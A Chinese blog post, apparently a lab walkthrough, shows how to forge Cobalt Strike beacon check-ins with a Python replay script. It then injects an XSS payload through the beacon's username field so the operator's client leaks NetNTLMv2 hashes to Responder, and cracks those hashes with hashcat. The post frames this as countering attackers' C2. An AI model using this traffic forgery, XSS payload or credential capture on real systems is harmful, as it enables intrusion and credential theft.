当前位置: 首页 > article >正文

网络安全最新XSS漏洞

1. 原理部分

1.1 CS上线流量

本地主机(vm8网卡): windows11 192.168.52.1

服务端: windows10 192.168.52.129

被控端: windows10 192.168.52.140

首先生成一个裸奔马,然后在被控端打开wireshark并且点击exe上线,我们这里只考虑应用层的包,所以过滤一下,我这里得到4个包
image.png

前两个先不看,先看3和4,他们比较亲民点,追踪流发现cookie中存在一个加密过后的值,而凭借经验不难看出很大可能是RSA非对称加密,猜想这个就是上线的请求了(也就是心跳包)
image.png

为了验证猜想,我用本地主机利用python发出该请求代码如下(这里为了书写方便附加个hearder转字典)

import requests
import time

url = 'http://192.168.52.128/fwlink'
header = {
    "Cookie":"OphJmHM6fR6cjpj4DMdsF3epxwniVsGao14/2a2WmqR0EoEqKdrz92bfuNUurfO1m2NGY/YgEp6tiaZr1JpVaUa2mGYPjEJCiLxBj13VGk31G4E6uI5bG5EPvM4RjWUMZnrlfJiWNGygdJGeH9mpXz40zPFT1VjWd49Wf0QKZog=",
    "User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)",
    "Host":"192.168.52.128",
    "Connection":"Keep-Alive",
    "Cache-Control":"no-cache"
}

while True:
    requests.get(url,headers=header)
    time.sleep(10)

可以看到达到效果了
image.png

当然我们这里想获得类似的信息也可以通过我们上图中第一个请求OwQF来拿Stage分析出来,这里可以用工具
image.png
image.png

上图中PublicKey并不是真正的key,里面有些垃圾填充,就是后边那些AAAAAAA,所以正确的key如下所示

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCKCnNWl64nFkgSz/CstkQXvrq/6bxXcI55UIsPyzIkoTG/zwF6yxfFTOiufyP4Ji0Dc9dI+K+yZhbr5Ou0h8fSjlOaaD+fEq24JN/BNXGwVTBATmwuxoGRezMxr7XvN2O/mtItwT8uFSv5RsITh1JVC3Qdyt+wO/Ng2L80NepiWQIDAQAB==

到这里就可以利用脚本来达到批量上线的目的了,这里可以利用师傅现成的脚本达到上线的目的
image.png

原理也是非常简单,就是更改对应stage不同位置对应的值
image.png


2. XSS利用

​ 目前CS出现XSS漏洞的原因主要是因为CS的客户端可以被HTML渲染,目前已知存在位置为计算机名,username等,因为再前面我们可以自定义上线,所以更改一下这些地方的信息不是难事

2.1 反制获取NTLM

这个是现在网上复现成功较多的,也非常简单,首先我在kali启动responder

responder -v -I eth0

开始监听
image.png

这时我们只需要将XSS的payload加到CS的用户名那里,payload如下

<html><img src='file://192.168.52.129/a'%>

我们还是利用fakesubmit,然后将User_name字典的内容改成如下所示,然后上线一台机器
image.png

由于我们的这个payload有点长,而原有的fakesubmitrsa.encrypt加密函数最多加密117字节,所以会报错,然后我简单的改了下脚本,如下图所示需要自己对照改
image.png

然后直接执行脚本上线
image.png

然后再回头看我们的kali
image.png

ok,这回我们可以拿着hash去爆破了

image.png

创建了test将hash放进去

#-m 指定密文类型,5600对应的就是NetNTLMv2
#--force 为忽略警告
hashcat -m 5600  ./test /Black/zidian/fuzzDicts/passwordDict/top500.txt --force

爆破成功
image.png


http://www.kler.cn/a/400577.html

相关文章:

  • 基于Spring Boot+Unipp的博物馆预约小程序(协同过滤算法、二维码识别)【原创】
  • 阿里云引领智算集群网络架构的新一轮变革
  • 如何轻松导出所有 WordPress URL 为纯文本格式
  • nuget 管理全局包、缓存和临时文件夹
  • Vue3 provide 和 inject的使用
  • 数据结构-哈夫曼树
  • 【视觉SLAM】4b-特征点法估计相机运动之PnP 3D-2D
  • mysql bin log分析
  • SpringBoot(6)-Shiro
  • 无人机反制新突破,高功率激光反无技术详解
  • 在vue3中如何优雅的管理loading状态
  • 深入内核讲明白Android Binder【一】
  • C++ STL知识点100问
  • 基于YOLOv8深度学习的智慧农业柑橘病害识别检测系统(PyQt5界面+数据集+训练代码)
  • ISCTF 2024 web
  • aws云服务器:高可靠性和数据安全
  • 使用 Easegress 实现 Telegram 翻译机器人
  • 鸿蒙北向开发环境安装指南
  • 使用ivew-ui-plus 的Submit组件踩坑 injection “LoginInstance“ not found 记录 问题原因分析与解决方案
  • HarmonyOS 如何获取设备信息(系统、版本、网络连接状态)
  • HMSC联合物种分布模型在群落生态学中的贝叶斯统计分析应用
  • SpringBoot使用@Validated注解实现参数的验证
  • Docker中的一些常用命令
  • git根据远程分支创建本地新分支
  • 文章解读与仿真程序复现思路——电力系统自动化EI\CSCD\北大核心《基于改进容积卡尔曼滤波的含光伏配电网动态状态估计》
  • 【大语言模型】ACL2024论文-15 大型语言模型中的最佳解释推断